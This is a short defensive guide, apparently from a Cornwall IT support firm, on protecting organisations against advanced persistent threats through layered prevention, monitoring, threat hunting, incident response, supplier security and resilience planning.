How To Guide
How to Protect Against Advanced Persistent Threats (APTs)
APTs are targeted, patient attacks by well-resourced adversaries.
Overview
Attackers may spend months inside your network before activating.
Step 1: Prevention
Harden defences.
1
Defence in Depth
- Firewall with IDS/IPS
- Network segmentation
- EDR on all endpoints
- MFA and PAM
- Encryption and DLP
- Security awareness training
2
Reduce Surface
- Disable unnecessary services
- Remove unused accounts
- Patch within 14 days
- Harden with CIS Benchmarks
- Restrict PowerShell
- Disable Office macros
Step 2: Detection
Find attackers.
1
Monitoring
- SIEM for log correlation
- EDR for endpoint visibility
- Monitor DNS for malicious domains
- Watch for lateral movement
- Threat intelligence feeds
2
Hunting
- Actively search for threats
- Hunt unusual processes
- Check scheduled tasks
- Review PowerShell logs
- Quarterly exercises
Step 3: Response
Handle correctly.
1
APT Response
- Understand full scope before blocking
- Engage professional IR services
- Map all compromised accounts
- Coordinate eradication
- Reset ALL credentials
- Monitor 90 days post-incident
Warning:
APTs maintain multiple persistence mechanisms. Full scope assessment before eradication is critical.
3
Supply Chain Security
- APT actors increasingly target smaller companies to reach their larger clients
- Assess the security posture of your critical vendors and suppliers
- Require security certifications from key suppliers (Cyber Essentials, ISO 27001)
- Monitor software supply chain: Verify integrity of updates and patches
- Limit supplier access to only the systems and data they need
- Review supplier access quarterly and revoke when no longer needed
- Include security requirements in all supplier contracts
4
Incident Indicators to Watch
- Unusual outbound connections to foreign IP addresses or domains
- PowerShell or command-line activity on servers that normally have none
- New admin accounts appearing without change request documentation
- Changes to scheduled tasks or startup items on critical servers
- DNS queries to newly registered domains (less than 30 days old)
- Failed authentication followed by successful authentication from different source
- Large data archives being created in temporary directories
- Service accounts being used interactively (logging in via RDP or console)
5
Building Resilience
- Assume you will be breached — design systems to limit damage when it happens
- Network segmentation prevents lateral movement from one compromised system
- Offline backups ensure recovery even if all network-connected systems are encrypted
- Incident response retainer: Pre-arrange with a professional IR firm before you need them
- Cyber insurance: Ensure your policy covers APT-style targeted attacks specifically
- Regularly update your threat model based on threats to your industry sector
- Participate in industry threat intelligence sharing groups (CiSP in the UK)
- Accept that security is ongoing investment, not a one-time project
Pro Tip:
The UK's Cyber Information Sharing Partnership (CiSP) is a free, government-backed platform where businesses share threat intelligence. Joining gives you early warning of threats targeting your sector.
Need Professional Help?
Our engineers provide expert assistance with setup, troubleshooting, and ongoing support for businesses and individuals across Cornwall.